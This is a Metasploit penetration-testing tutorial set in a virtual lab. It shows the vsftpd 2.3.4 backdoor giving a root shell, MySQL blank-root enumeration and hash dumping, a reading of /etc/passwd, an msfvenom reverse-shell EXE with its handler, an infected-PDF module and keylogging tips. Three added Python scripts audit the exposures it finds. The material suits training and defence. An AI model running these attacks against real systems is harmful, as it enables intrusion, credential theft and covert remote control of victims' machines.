Hunt down vulnerabilities with the Metasploit pen-testing tool
Security Tools
Armitage and Meterpreter
To get a quick taste of Metasploit's capabilities, just click on the Armitage entry in the main menu in Parrot or Kali Linux. Tutorials Point [7] and Offensive Security [8] offer good beginner tutorials for point-and-click forensics (as a friend who is a trainer for the German police force calls them).
Armitage enjoys a good reputation among red teams, thanks to its collaboration mode, which the developers themselves refer to as multiplayer Metasploit or red team collaboration mode. Armitage (Figure 5) can also perform simple Nmap host scans from its main menu, but the true strength of the tool only becomes apparent when several users work together on a compromised host in a Meterpreter shell.
Meterpreter [9] is probably the most appealing payload an attacker can install on a remote computer. It can be easily hidden in other file formats (e.g., PDFs), sent as an email attachment, or embedded in websites. All it takes is for the victim to open a prepared website, email, or corresponding document, and the attacker gains control of the computer.
Meterpreter as a payload opens a reverse shell in this case – ransomware would now encrypt the computer and open a backdoor. A hijacked Windows 10 machine, for example, now gives the attacker access from the command line, perhaps even as the admin user. Long before PowerShell, the police trainer I referred to above cited Meterpreter as being the better shell for the Windows admin – not only because of the extensive command set, but also because of numerous helpful extensions like Mimikatz [10], which played a central role in the 2015 attack on the German Bundestag [11], helping to spy on the Active Directory domain and gain domain admin rights.
In the process, Meterpreter resides completely in the hijacked machine's RAM. Thanks to in-memory dynamic link library (DLL) injection, it does not write anything to the hard drive, does not create any new processes, and therefore ideally does not leave any permanent traces. Forensic experts call this a very small forensic footprint, but it can spill over into other running processes.
Meterpreter is extremely flexible, as well, which should come as no surprise, because it was designed to avoid the tricky decisions involved in choosing a suitable payload up front. Thanks to Meterpreter, that choice can be postponed: the attacker loads what is needed later in the process, from the remote shell, without triggering alarms from virus scanners or similar tools.
From the command line, two basic methods are available: bind and reverse. With bind, Meterpreter listens on a port on the victim until the attacker connects. With reverse, the victim computer itself connects directly to the control server, which the attacker must have configured accordingly for the connection to work. Both approaches are useful in different scenarios.
All of the above can best be tested with Metasploitable. Version 2 of the image is now available with many additional security holes [12]. A complete list of all the vulnerabilities is beyond the scope of any article, but it is worth taking a look at the Exploitability Guide [13].
The image offered for download is not an installer; it is a ready-made disk image built for use in virtualized environments. It comes in the VMware VMDK format with separate configuration files. To use it in Libvirt/KVM, you have to download it from the Rapid7 website (this takes a bit of time because Rapid7 requires you to register) and then unpack and convert [14]. Running a script lets you edit the configuration file and create a new virtual machine with virsh in Libvirt. Although it sounds complicated, it can be done with just three commands:
$ qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2 Metasploitable.qcow2
$ wget https://bazaar.launchpad.net/~ubuntu-virt/virt-goodies/trunk/download/head:/vmware2libvirt
$ python vmware2libvirt -f Metasploitable.vmx > Metasploitable.xml
The Ubuntu script worked without any problems on a laptop running openSUSE Tumbleweed in our lab. The command
zypper in virt-manager libvirtd
installs both the server service and the front end, but I was unable to convert the image with virt-v2v in the test; hence, the Ubuntu script in the wget command.
By default, the Metasploitable image uses the Libvirt default network, which is set to NAT, thus isolating the machines in the test scenario from the rest of the network. Don't forget: libvirtd only runs if systemd starts it, preferably permanently. The commands
systemctl enable libvirtd
systemctl status libvirtd
service libvirtd start
enable libvirtd permanently, check its status, and start it immediately. The next step is to import the image:
virsh -c qemu:///system define Metasploitable.xml
The virtual machine manager (virt-manager) will come up with a fully configured, bootable Metasploitable instance. It makes sense to ensure that the system automatically boots this instance and the associated network when booting or starting virt-manager.
Now install Windows 10 on another virtual machine and do the same for Kali Linux and Parrot Linux (although the two Live distributions also work wonderfully without the install). For performance reasons, I decided to install both distributions on virtual disks.
After completing this preliminary work, start the test with ssh-copy-id to transfer your own SSH key to the three Linux machines; an alias for each Linux makes life easier from now on. For Metasploitable, the username and password are msfadmin. Kali usually does not have a root account (if it does, the password is toor; otherwise, you can configure it during the installation), but it does have a kali user with kali as the password. Parrot Linux also uses toor as the root password but largely disables the account.
The command
ssh-copy-id msfadmin@192.168.122.<nnn>
copies your public key to the virtual Metasploitable machine on IP address 192.168.122.nnn. Three aliases in ~/.alias make life easier (Listing 1), and don't forget to source the file after editing. Entries in the hosts file or in the DNS also help.
Listing 1
Practical Aliases
alias metasploitable='ssh msfadmin@192.168.122.236'
alias kali='ssh kali@192.168.122.192'
alias parrot='ssh parrot@192.168.122.56'
At last, nothing stands in the way of an initial test of Metasploitable. Thanks to an intentional vulnerability, reached here over Telnet, a backdoor opens up to the Parrot user (Listing 2). The example impressively shows the importance of signed software packages from reliable sources. Here, an attacker has obviously made sure that the FTP service on port 21 opens a backdoor with admin rights on port 6200 if – would you believe it? – the username of the vsftpd login contains a smiley (user mfeilner:)). Then the second telnet command in the example allows login-free access to a kind of root shell.
Listing 2
Telnet Backdoor
Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Sun Jul 25 20:12:28 2021 from 192.168.122.1
[mfeilner@parrot][~] $ telnet 192.168.122.236 21
Trying 192.168.122.236...
Connected to 192.168.122.236.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user mfeilner:)
331 Please specify the password.
<pass>
^]
telnet> quit
Connection closed.
[mfeilner@parrot][~] $ telnet 192.168.122.236 6200
Trying 192.168.122.236...
Connected to 192.168.122.236.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
cat /etc/passwd;
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
reboot;
Connection closed by foreign host.
Metasploitable runs many more insecure services that an Nmap scan brings to light (Listing 3), and because the nmap command also finds a MySQL database on Metasploitable, the next example shows how an attacker could easily hijack the database management system – thanks to a missing root password. Listing 4 shows the entire command sequence and the return output from Parrot, MSF, and Metasploitable. The msfconsole command launches the Metasploit framework's interactive shell. Listing 5 shows the verification by a MySQL command, including the retrieval of user data from /etc/passwd.
Listing 3
Nmap Scan
[root@parrot][/] # nmap -p0-65535 metasploitable
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 22:05 CEST
Nmap scan report for metasploitable (192.168.122.236)
Host is up (0.095s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  ircs-u
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  msgsrvr
45901/tcp open  unknown
46758/tcp open  unknown
58453/tcp open  unknown
60132/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.35 seconds
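The scan above is the attacker's view, but the same output is also the defender's exposure list. As an added example (not from the article), the following Python script parses Nmap's normal-output format and flags the services on Metasploitable that an auditor would want closed or hardened first; the scan text is embedded as a constructed excerpt of the listing, and the risk reasons are the reviewer's own assessment, not something Nmap reports.

```python
import re

# Constructed excerpt in Nmap's normal-output format, modelled on the scan shown
# above; embedded here so the check runs offline without touching the network.
NMAP_OUTPUT = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 22:05 CEST
Nmap scan report for metasploitable (192.168.122.236)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
2049/tcp  open  nfs
3306/tcp  open  mysql
3632/tcp  open  distccd
5900/tcp  open  vnc
6000/tcp  open  X11
8180/tcp  open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.35 seconds
"""

# Why each service matters when it is reachable. This is the reviewer's
# assessment for the lab network, not something Nmap reports.
RISKY_SERVICES = {
    "ftp": "clear-text logins (and vsftpd 2.3.4 carries the backdoor shown above)",
    "telnet": "clear-text logins",
    "exec": "rexec: clear-text credentials",
    "login": "rlogin: host-based trust, no encryption",
    "shell": "rsh: host-based trust, no encryption",
    "nfs": "exports are often world-readable; check /etc/exports",
    "mysql": "check for password-less accounts and the FILE privilege",
    "distccd": "unauthenticated compile jobs amount to remote code execution",
    "vnc": "weak or absent authentication is common",
    "X11": "an open X server exposes keystrokes and screen contents",
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")


def parse_nmap(text):
    """Map each scanned host (IP if shown, else name) to (port, state, service) triples."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            current = m.group(2) or m.group(1)
            hosts[current] = []
            continue
        m = PORT_LINE.match(line)
        if m and current is not None:
            hosts[current].append((int(m.group(1)), m.group(3), m.group(4)))
    return hosts


def risky_exposures(hosts):
    """Return (host, port, service, reason) for every open service on the risk list."""
    return [(host, port, service, RISKY_SERVICES[service])
            for host, ports in hosts.items()
            for port, state, service in ports
            if state == "open" and service in RISKY_SERVICES]
```

Feed it the output of a full `nmap -p0-65535` run and the list it returns is the order in which to start turning services off.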
Listing 4
Hijacking the MySQL Database
[root@parrot][/] # msfconsole
(...)
msf6 > use auxiliary/scanner/mysql/mysql_version
msf6 auxiliary(scanner/mysql/mysql_version) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_version) > run
[+] 192.168.122.236:3306 - 192.168.122.236:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] metasploitable:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_version) > use auxiliary/admin/mysql/mysql_enum
msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.122.236
[-] 192.168.122.236:3306 - Access denied
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.122.236
[*] 192.168.122.236:3306 - Running MySQL Enumerator...
[*] 192.168.122.236:3306 - Enumerating Parameters
[*] 192.168.122.236:3306 - MySQL Version: 5.0.51a-3ubuntu5
(...)
[*] 192.168.122.236:3306 - Enumerating Accounts:
[*] 192.168.122.236:3306 - List of Accounts with Password Hashes:
[+] 192.168.122.236:3306 - User: debian-sys-maint Host: Password Hash:
[+] 192.168.122.236:3306 - User: root Host: % Password Hash:
[+] 192.168.122.236:3306 - User: guest Host: % Password Hash:
[*] 192.168.122.236:3306 - The following users have GRANT Privilege:
[*] 192.168.122.236:3306 - User: debian-sys-maint Host:
[*] 192.168.122.236:3306 - User: root Host: %
[*] 192.168.122.236:3306 - User: guest Host: %
[*] 192.168.122.236:3306 - The following users have CREATE USER Privilege:
(...)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 192.168.122.236:3306 - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.122.236:3306 - Saving HashString as Loot: root:
[+] 192.168.122.236:3306 - Saving HashString as Loot: guest:
[*] metasploitable:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 > use /auxiliary/scanner/mysql/mysql_login
[*] Using auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > use /auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.122.236:3306 - 192.168.122.236:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.122.236:3306 - No active DB -- Credential data will not be saved!
[+] 192.168.122.236:3306 - 192.168.122.236:3306 - Success: 'root:'
[*] metasploitable:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
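The enumerator's account listing is also a ready-made audit input for the database owner. As an added example (not from the article or from Metasploit), this Python script parses the mysql_enum account and privilege lines, reports accounts with blank passwords, wildcard hosts and the FILE privilege (the privilege that makes the load_file() retrieval of /etc/passwd in Listing 5 possible), and emits the MySQL 5.0 statements that close them. The input is a constructed sample modelled on Listing 4; the hash and the localhost entry are made up, and the FILE section is assumed to be printed in the same format as the GRANT section.

```python
import re

# Constructed sample in the format of the mysql_enum account listing shown above.
# The hash, the localhost host and the FILE section are made up for the demonstration.
ENUM_OUTPUT = """\
[*] 192.168.122.236:3306 - List of Accounts with Password Hashes:
[+] 192.168.122.236:3306 - User: debian-sys-maint Host: localhost Password Hash: *0123456789ABCDEF0123456789ABCDEF01234567
[+] 192.168.122.236:3306 - User: root Host: % Password Hash:
[+] 192.168.122.236:3306 - User: guest Host: % Password Hash:
[*] 192.168.122.236:3306 - The following users have GRANT Privilege:
[*] 192.168.122.236:3306 - User: debian-sys-maint Host: localhost
[*] 192.168.122.236:3306 - User: root Host: %
[*] 192.168.122.236:3306 - User: guest Host: %
[*] 192.168.122.236:3306 - The following users have FILE Privilege:
[*] 192.168.122.236:3306 - User: root Host: %
[*] 192.168.122.236:3306 - User: guest Host: %
"""

SECTION = re.compile(r"(List of Accounts)|The following users have (\w+) Privilege")
# Lazy host match so an empty host ("Host: Password Hash:") is parsed as blank.
ACCOUNT = re.compile(r"User: (\S+) Host: (\S*?)\s*(?:Password Hash:\s*(\S*))?$")


def parse_enum(text):
    """Return {(user, host): {"hash": str, "privs": set}} from mysql_enum output."""
    accounts, section = {}, None
    for line in text.splitlines():
        s = SECTION.search(line)
        if s:
            section = "accounts" if s.group(1) else s.group(2)
            continue
        m = ACCOUNT.search(line)
        if not m or section is None:
            continue
        entry = accounts.setdefault((m.group(1), m.group(2)), {"hash": "", "privs": set()})
        if section == "accounts":
            entry["hash"] = m.group(3) or ""
        else:
            entry["privs"].add(section)
    return accounts


def audit(accounts):
    """Return (findings, remediation SQL) in MySQL 5.0 syntax, as a DBA would apply it."""
    findings, sql = [], []
    for (user, host), info in sorted(accounts.items()):
        acct = f"'{user}'@'{host}'"
        if not info["hash"]:
            findings.append(f"{acct}: empty password")
            sql.append(f"SET PASSWORD FOR {acct} = PASSWORD('<new-strong-password>');")
        if host == "%":
            findings.append(f"{acct}: may log in from any host")
        if "FILE" in info["privs"]:
            findings.append(f"{acct}: FILE privilege permits load_file('/etc/passwd')")
            sql.append(f"REVOKE FILE ON *.* FROM {acct};")
        if "GRANT" in info["privs"] and user != "root":
            findings.append(f"{acct}: can grant privileges to other accounts")
    return findings, sql
```

The wildcard-host finding has no automatic fix in the output because the right replacement host depends on where the application actually connects from.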
As you can see at the end of Listing 5, Metasploit does not yet use a database for the captured data here, so it does not leave any traces either. If you do use a database (PostgreSQL by default), you can draw on a few more helpful functions. The command
service postgresql start
starts PostgreSQL, so next you need to initialize it for Metasploit (Listing 6). The db_nmap command populates the database with hosts.
Listing 5
Verification with a MySQL Command
(mfeilner@kali)-[~] $ mysql -h metasploitable -u root
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 15
(...)
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.001 sec)
MySQL [(none)]> select load_file('/etc/passwd');
+----------------------------------------------(...)+
| load_file('/etc/passwd') (...)
+----------------------------------------------(...)+
| root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
(...)
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
(...)+
1 row in set (0.001 sec)
Listing 6
Initializing Database for Metasploit
(root@kali)-[/home/mfeilner] # msfdb init
[+] Starting database
[+] Creating database user 'msf'
Enter the password of the new role:
Enter it again:
[+] Creating databases 'msf'
(...)
[+] Creating databases 'msf_test'
(...)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
(root@kali)-[/home/mfeilner] msf6 > help database
Database Backend Commands
=========================
Command     Description
-------     -----------
analyze     Analyze database information about a specific (...)
db_nmap     Executes nmap and records the output (...)
msf6 > db_nmap -v -sV 192.168.122.0/24
(...)
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 66.64 seconds
msf6 > hosts
Hosts
=====
address          mac  name            os_name  os_flavor  os_sp  purpose  info  comments
-------          ---  ----            -------  ---------  -----  -------  ----  --------
192.168.122.1                         Unknown                    device
192.168.122.56        parrot          Unknown                    device
192.168.122.192       kali            Unknown                    device
192.168.122.236       metasploitable  Linux                      server
As Listing 7 shows, Metasploit now automatically runs the mysql_login scan against all listed hosts and also finds the vulnerable root account without a password. For all other cases, dictionaries for a password attack are available in /usr/share/metasploit-framework/data/wordlists. You can apply them by typing:
SET PASS_FILE /<path/to/list>
Listing 7
MySQL Scan with Database
msf6 > use /auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > run
[-] 192.168.122.1:3306 - 192.168.122.1:3306 - Unable to connect: The connection was refused by the remote host (192.168.122.1:3306).
[*] Scanned 1 of 5 hosts (20% complete)
(...)
[*] Scanned 4 of 5 hosts (80% complete)
[+] 192.168.122.236:3306 - 192.168.122.236:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.122.236:3306 - 192.168.122.236:3306 - Success: 'root:'
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_login) > creds
Credentials
===========
host             origin           service           public  private         realm  private_type    JtR Format
----             ------           -------           ------  -------         -----  ------------    ----------
192.168.122.236  192.168.122.236  3306/tcp (mysql)  root                           Blank password
In Listing 7, creds shows all available, automatically acquired login data.
Even though the multistage Metasploit workflow is now clearer, the examples only outline the possibilities the framework offers. Even search login in the MSFconsole returns 248 exploits that could be used to log on to your systems. For example,
use auxiliary/scanner/smb/smb_login
helps you find out whether a Samba/Windows/Active Directory login also works for other services or servers.
If all of this is not enough, an attacker can use extensions like Autopwn (Listing 8) to make it even easier to hijack third-party machines in an automated process. The module was removed from Metasploit's standard scope in recent years.
Listing 8
Retroactive Autopwn Install
# cd /usr/share/metasploit-framework/plugins
# sudo wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
# msfconsole
msf6 > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
Windows 10 and More
Metasploitable is not used in Listing 9, but it shows an attack on the Windows 10 instance. The latest versions of Microsoft's operating system already come with a considerable number of protection mechanisms; in this article, I avoid describing workarounds or sources for downloading the exploit.
Listing 9
Remote Shell on Windows 10
(mfeilner@kali)-[~] $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.192 -f exe -o /tmp/backdoor.exe
(mfeilner@kali)-[~] $ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 192.168.122.192
LHOST => 192.168.122.192
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.122.192:4444
[*] Sending stage (175174 bytes) to 192.168.122.43
[*] Meterpreter session 1 opened (192.168.122.192:4444 -> 192.168.122.43:57816) at 2021-07-26 01:49:31 +0200
meterpreter > execute -f cmd.exe -i -H
Process 6500 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.1110]
(c) Microsoft Corporation. All rights reserved.
C:\Users\mfeilner\Desktop>
In this example, msfvenom [15] creates an EXE file that contains a Meterpreter backdoor. With social engineering, the attacker can get the Windows user to throw all warnings (Figure 6) to the wind and execute the file. If this works, the attack can be configured and started with a few Metasploit commands. At the end of the day, the attacker has a remote administrator shell on Windows 10.
This method also works with a PDF file, as Listing 10 shows. However, this requires an existing PDF to serve as the carrier. In the example, simply viewing the PDF document on the victim's computer opens a remote shell for the attacker. They could now install a keylogger (e.g., keyscan_start); keyscan_dump returns the input.
Listing 10
An Infected PDF
(mfeilner@kali)-[~] $ msfconsole
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
(...)
msf6 > set EXENAME reverse.exe
(...)
msf6 > set FILENAME tibet.pdf
(...)
msf6 > set INFILENAME /tmp/test.pdf
(...)
msf6 > set OUTPUTPATH /tmp
(...)
msf6 > set PAYLOAD windows/meterpreter/bind_tcp
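From the receiving side, the attachment-plus-launch construction that this module produces is visible in the raw file. As an added example (not from the article), this Python script counts the action-related keys in a PDF, resolves the #xx escapes that PDF name objects allow (so a key written as /Embedded#46ile cannot slip past a plain keyword search), and rates the file; the two PDFs are constructed stubs, and the key list and verdict rules are the reviewer's own.

```python
import re
from collections import Counter

# PDF name objects may spell characters as #xx, so "/Embedded#46ile" is the same
# name as "/EmbeddedFile"; normalise before matching or the check is trivially bypassed.
NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

# Keys that make a document act rather than merely display. An embedded file
# launched via /OpenAction or /Launch is the pattern the PDF-with-EXE trick relies on.
ACTIVE_KEYS = (b"/EmbeddedFile", b"/EmbeddedFiles", b"/Launch",
               b"/JavaScript", b"/JS", b"/OpenAction", b"/AA")
HIGH_RISK = {"/Launch", "/JavaScript", "/JS"}


def normalise_names(data: bytes) -> bytes:
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Count action-related keys in a raw PDF and return a verdict."""
    text = normalise_names(data)
    counts = Counter()
    for key in ACTIVE_KEYS:
        # The lookahead keeps "/JS" from matching inside a longer name such as "/JSX".
        hits = re.findall(re.escape(key) + rb"(?![A-Za-z0-9])", text)
        if hits:
            counts[key.decode()] = len(hits)
    attachment = "/EmbeddedFile" in counts or "/EmbeddedFiles" in counts
    auto_action = "/OpenAction" in counts or "/AA" in counts
    if counts.keys() & HIGH_RISK or (attachment and auto_action):
        verdict = "suspicious"
    elif counts:
        verdict = "review"
    else:
        verdict = "clean"
    # Object streams hold dictionaries in compressed form; a raw scan can miss keys there.
    return {"keys": dict(counts), "object_streams": b"/ObjStm" in text, "verdict": verdict}


# Constructed minimal PDFs: enough structure for the scan, not meant to render.
CLEAN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
             b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
             b"trailer << /Root 1 0 R >>\n%%EOF\n")

DROPPER_PDF = (b"%PDF-1.6\n1 0 obj << /Type /Catalog /Pages 2 0 R\n"
               b"  /Names << /EmbeddedFiles << /Names [(reverse.exe) 4 0 R] >> >>\n"
               b"  /OpenAction << /S /Launch /F (reverse.exe) >> >> endobj\n"
               b"4 0 obj << /Type /Filespec /F (reverse.exe) /EF << /F 5 0 R >> >> endobj\n"
               b"5 0 obj << /Type /Embedded#46ile /Length 2 >> stream\nMZ\nendstream endobj\n"
               b"trailer << /Root 1 0 R >>\n%%EOF\n")
```

A file that reports object_streams as True should be inflated (for example with a PDF parser that expands FlateDecode streams) before the verdict is trusted, since the keys may sit inside the compressed objects.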
Another danger is when the attacker selects one process [16] and switches to another process used by the admin with migrate <PID>. The attacker can retrieve the PID with tools like ps (in the remote shell). The keylogger outputs the keystrokes fielded by the respective process – the winlogon.exe process is worth looking at, for example.
Windows 10 or PDF viewers are by no means the only targets: The news on the Meterpreter homepage turns out to be a real treasure trove for Apple hackers [17], and an Infosec [18] blog post describes how easy it is to hijack an Android device with an infected APK package. Again, this just involves five steps, thanks to Metasploit.
Infos
- [1] Metasploit Framework: https://docs.rapid7.com/metasploit/msf-overview/
- [2] "Pen testing and PDF manipulation with Metasploit" by Hans-Peter Merkel and Markus Feilner, Linux Magazine, issue 121, December 2010, p. 18
- [3] "Hacker trainer for law enforcement agents" by Markus Feilner, Linux Magazine, issue 102, May 2009, p. 92, https://www.linux-magazine.com/Issues/2009/102/Forensics-in-Freiburg
- [4] "The sys admin's daily grind – Metasploitable" by Charly Kühnast, Linux Magazine, issue 172, March 2015, p. 66, https://www.linux-magazine.com/Issues/2015/172/Charly-s-Column-Metasploitable
- [5] "Metasploit Wrap-Up" by Dean Welch, Rapid7 blog: https://www.rapid7.com/blog/post/2021/10/22/metasploit-wrap-up-135/
- [6] "Contributing to Metasploit": https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
- [7] Tutorials Point: https://www.tutorialspoint.com/metasploit/metasploit_armitage_gui.htm
- [8] Offensive Security: https://www.offensive-security.com/metasploit-unleashed/armitage/
- [9] Meterpreter: https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
- [10] Mimikatz: https://www.offensive-security.com/metasploit-unleashed/mimikatz/
- [11] German Parliament hacked: https://it-akten.de/digital-attack-on-german-parliament/
- [12] Metasploitable: https://information.rapid7.com/download-metasploitable-2017.html
- [13] Exploitability guide: https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
- [14] Image conversion: https://linux-hacking-guide.blogspot.com/2015/05/convert-vmware-virtual-machine-to-kvm.html
- [15] msfvenom: https://www.hackingarticles.in/msfvenom-tutorials-beginners/
- [16] Keyloggers: https://www.offensive-security.com/metasploit-unleashed/keylogging/
- [17] Meterpreter and Apple: https://meterpreter.org/category/apple/
- [18] Hijacking Android: https://resources.infosecinstitute.com/topic/lab-hacking-an-android-device-with-msfvenom/